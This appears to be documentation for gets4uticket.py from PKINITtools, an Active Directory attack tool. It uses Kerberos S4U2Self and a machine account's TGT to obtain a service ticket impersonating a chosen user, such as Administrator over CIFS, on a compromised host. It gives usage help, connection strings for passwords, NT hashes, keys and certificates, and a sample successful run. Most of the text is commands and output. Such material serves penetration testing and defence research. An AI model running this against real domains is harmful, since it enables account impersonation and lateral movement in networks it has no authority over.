Uses Kerberos S4U2Self to request a service ticket that is valid on the host for which you’ve obtained a certificate. This ticket can then be used to interact with the original host. This only requires a TGT for the machine account of this host. This TGT should be in a ccache file that you specify in the kerberos_connection_url
. The only accepted kerberos_connection_url
for this example is one containing a ccache file, so for example kerberos+ccache://domain.local\\victimhostname\$:[email protected]
. The SPN should be a service name on the host you are impersonating, you can’t use this for delegation attacks (since it does not implement S4U2Proxy, there are plenty of tools already for that).
Install PKINITtools.
gets4uticket.py [-h] [-v] kerberos_connection_url spn targetuser ccache
positional arguments:
kerberos_connection_url
the kerberos target string in the following format kerberos+ccache://domain\user:file.ccache@<domaincontroller-ip>
spn the service principal in format <service>/<server-hostname>@<domain> Example: cifs/[email protected] for a TGS ticket to be used for file access on server "fileserver". IMPORTANT:
SERVER'S HOSTNAME MUST BE USED, NOT IP!!!
targetuser
ccache ccache file to store the TGT ticket in
options:
-h, --help show this help message and exit
-v, --verbose
==== Extra Help ====
kerberos connection url secret types:
- Plaintext: "pw" or "pass" or "password"
- NT hash: "nt"
- RC4 key: "rc4"
- AES128/256 key: "aes"
- CCACHE file: "ccache"
- SSPI: "sspi"
Example:
- Plaintext + SOCKS5 proxy:
kerberos+password://domain\user:[email protected]/proxytype=socks5&proxyhost=127.0.0.1&proxyport=1080
- Plaintext:
kerberos+password://domain\user:[email protected]
kerberos+pw://domain\user:[email protected]
kerberos+pass://domain\user:[email protected]
- NT hash:
kerberos+nt://domain\user:[email protected]
- SSPI:
TEST/user/sspi:@192.168.1.1
- RC4 key:
kerberos+rc4://domain\user:[email protected]
- AES key:
kerberos+aes://domain\user:[email protected]
- CCACHE file:
kerberos+ccache://domain\user:[email protected]
- KEYTAB file:
kerberos+keytab://domain\user:[email protected]
- PFX file:
kerberos+pfx://TEST.corp\Administrator:[email protected]/?certdata=test.pfx
- PFX string (b64):
kerberos+pfxstr://TEST.corp\Administrator:[email protected]/?certdata=BASE64DATA
- No auth (preauth not req):
kerberos+none://TEST.corp\[email protected]/
(PKINITtools) user@localhost:~/PKINITtools$ python gets4uticket.py kerberos+ccache://testsegment.local\\s2019dc\$:[email protected] cifs/[email protected] [email protected] out.ccache -v
2021-07-28 10:09:13,687 minikerberos INFO Trying to get SPN with [email protected] for cifs/[email protected]
2021-07-28 10:09:13,695 minikerberos INFO Success!
2021-07-28 10:09:13,696 minikerberos INFO Done!